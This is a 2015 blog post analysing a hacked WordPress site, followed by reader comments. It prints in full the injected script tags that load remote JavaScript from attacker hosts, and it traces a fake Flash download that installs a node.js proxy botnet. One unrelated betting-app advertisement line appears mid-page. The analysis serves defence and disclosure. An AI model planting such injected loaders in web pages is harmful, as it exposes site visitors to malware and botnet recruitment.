What happens if your WordPress is hacked – or: How botnets are created with hijacked Worpess, fake Flash downloads and node.js
Published 2015-11-23, 14:14
I just noticed the website of an old employer has been hacked and some JavaScript is injected into their corporate website that runs on WordPress. Ouch. Of course I notified them about it and they’re just trying to figure out what happened and how to fix it.
This taken care of, I of course started looking at what the attackers placed there:
<script>
(function() {
var gcse = document.createElement('script');
gcse.type = 'text/javascript';
gcse.async = true;
gcse.src = "http://theboatersnetwork.com/js/main1.js";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(gcse, s);
})();
</script>
and
<script>
(function() {
var gcse = document.createElement('script');
gcse.type = 'text/javascript';
gcse.async = true;
gcse.src = "http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(gcse, s);
})();
</script>
(Actually the second script is inserted twice – probably the same post was hacked again and the payload placed a second time – even hacker forget stuff the did before.)
So we see there are two files included to this nice corporate website:
- http://theboatersnetwork.com/js/main1.js
- http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js
Let’s have a look at them.
http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js
(Copy of the file if it gets removed: http://pastebin.com/hyNmgD6b)
This checks if there is a ‚doRedirect‘ cookie set, if not it redirects to http://bit.do/bvSyy. This pseudo bit.ly link (note the .do domain instead of .ly) redirect to some link. It also offers statistics on http://bit.do/bvSyy-, so we know this redirect has already been used (at the time of writing) 18.000 times. And we also see all the domains that include this link. Ouch. (Now I notified some other German domains – can’t notify them all :/)
The link it redirects you to is http://w5ea5z6gf.homepage.t-online.de/js/20140427232734/ which is a faked Flash Player download site where you can download a file called http://btob.es/OLD_20100113/blogbtob/flashplayer19ax_ma_install.exe . This is of course not a Flash Player, but a ZIP that extracts itself.
In there you find some node.js binaries, a script to load node if it is missing and an index.js. If you are brave enough to execute this, it downloads an updater.js, version.txt (that only says „93“) and script.js:
- Copy of index.js: http://pastebin.com/BYLjqdq7
- Copy of updater.js: http://pastebin.com/Mg1VjcBs
- Copy of script.js: http://pastebin.com/emxkPv4U
updater.js is basically a pimped out version of the index.js we already have, but can basically do the same stuff. script.js is another beast with 729 lines of code. Executing this you get some output like this:
> node script.js
connecting
connected
{ type: ‚createProxy‘, id: 0 }
createProxy
{ type: ‚createProxy‘,
attachTo: { ip: ‚190.128.247.118‘, port: 53963 },
id: 1 }
createProxy
creating attached proxy: 190.128.247.118:53963
attached to 190.128.247.118:53963
So it seems this is connecting to a proxy in Paraguay and … I don’t know, because I didn’t (try to) understand what the rest of script.js actually does after that. Best guess is it connects to a proxy and gets some commands, also it creates a proxy itself on my machine that can be used by other nodes to connect to and use. Someone has this list of proxies to do whatever he wants with my machine in a node.js context – and that’s a lot of things he can do.
(Anyone wants to look at script.js a bit more and tell me what it actually does? I’m curious…)
http://theboatersnetwork.com/js/main1.js
(Copy of the file if it gets removed: http://pastebin.com/VS11VZmu)
This file is a bit more straight forward, although I absolutely don’t get why it does what it does:
- First it POSTs to a server to get a list of keywords
- Then it uses these keywords to GET a search on Google API: https://www.googleapis.com/customsearch/v1element
- It gets the URLs of the results and puts them in a list…
- … that is then POSTed back to the server while getting new keywords
- goto 1
It uses a proper Google API key to make these requests, so Google at least know what Google account is connected to these requests. The server it sends to is a Polish IP that is known for spam, so make of that what you will. But I honestly don’t know what the use of this activity is and how you could possible gain something from this.
(Any idea?)
Conclusion
Someone hacks WordPress websites and includes strange .js files that a) lead to fake Flash downloads that install a botnet on your PC and b) abuse your browser to get URLs from a Google search.
My former employer is still trying to figure out if this is serious and who is reponsible for fixing the modified wordpress posts… this could take some time.
Tipico Pay ist eine Einzahlungs-App für den Sportwetten-Anbieter Tipico.
( 1 )
To be honest it’s a cool idea of how the bots are connected and communicating, someone had spent a lot of time in developing this. Previously I had seen mostly sites with infected php files who were exploited for botnets and most of the hosting providers had provided alerts when someone is modifying your files without your notice. This scenario here might bypass the file monitoring of the system, since there are only some WordPress posts which are edited and it’s quite comprehensive attack. I’m impressed by the effort put in here, but at the same time it’s quite malicious.
Comment von Miglen am 23. November 2015
( 2 )
Another very good example of why one should consider using Content Security Policy (CSP), so origins of subresources can be whitelisted!
Comment von Caleb am 23. November 2015
( 3 )
I think the second file might be some SEO engineering to monitor the results from google requests at different geo-locations. Maybe they even try to find out, which sites are blocked or suppressed in different regions.
Comment von Thomas am 23. November 2015
( 4 )
Nice rabbit hole review of the issues. 🙂
Just a thought. There are a few services that clean up this sort of issue, and even update all of your WordPress related files and scripts, etc., for a flat fee. See: Sucuri.net, HackRepair.com and Uhack.us
Comment von Jim am 23. November 2015
( 5 )
The botnet is definitely doing something SEO-related. There are lots of SEO botnets that search stuff on Google to slightly (or heavily in some cases) modify google rankings.
Comment von Milkey Mouse am 24. November 2015
( 6 )
Very low level unskilled attempt to create a botnet.. No obfuscation and very low skill level to achieve this.. Not impressed..
Comment von D am 24. November 2015
( 7 )
[…] Analiza ataku na stronę opartą na WordPressie […]
Pingback von Weekendowa Lektura 2015-11-27 – bierzecie i czytajcie | Zaufana Trzecia Strona am 27. November 2015